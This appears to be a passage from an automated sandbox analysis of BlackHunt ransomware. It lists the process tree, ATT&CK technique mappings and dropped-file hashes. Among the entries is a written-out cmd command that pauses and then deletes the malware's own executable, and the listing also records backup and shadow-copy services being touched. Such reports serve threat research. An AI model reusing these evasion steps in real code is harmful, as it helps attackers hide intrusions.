C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:14212
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe"2⤵PID:2924
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2740
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:944
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1592
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6484
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:10044
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:7444
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD502a8a5574dba960255630092f16624ed
SHA11f5989e80499cbe5daed30f2297878fbea2bc6ce
SHA2567af6268e2c9b5676fa0a771c81330315f67a5c77eb68c6508da4ff5cfa99353d
SHA512a816d9060a706aa797127b767f25d0f164d081cd451a984b294c65dfc49dc0b2f2058912285bff7aa079dc2263c891452c245abfa9f4901e454a55f990ed98ff
-
Filesize
12KB
MD51c33aa8bf1e2b38cb8a77476b2734ff0
SHA161b53577846ad51b13be4c917eb0e79f19cd753b
SHA256681bdff58097451303556a89a75475a3c83ad408367bb03ccc9a852dbc4588d8
SHA512714b9ab4523297a85274fffcafb9e6251cee00cd09d4e7f226b46bf1258a1485812d4e13304c463a26aa62d801dd443f01514f832393b438ecfcd188c289c4e2
-
Filesize
684B
MD505beffda48ce99a43a6221bc1ad8343a
SHA1994c8a538d2a175ddcfce789fc3f2207b4876a83
SHA256964f8c652cea6790fea2a759c3eabb61c115450c7399dc969d4673127487fc68
SHA512dfcc5f1ee4ce77ddea607538e217283ee735759aa197278f92514bfc1fe61b9d7159f8b5d2678784613b564a74188d8c32ade08a3dff37fdc506acaf64db2378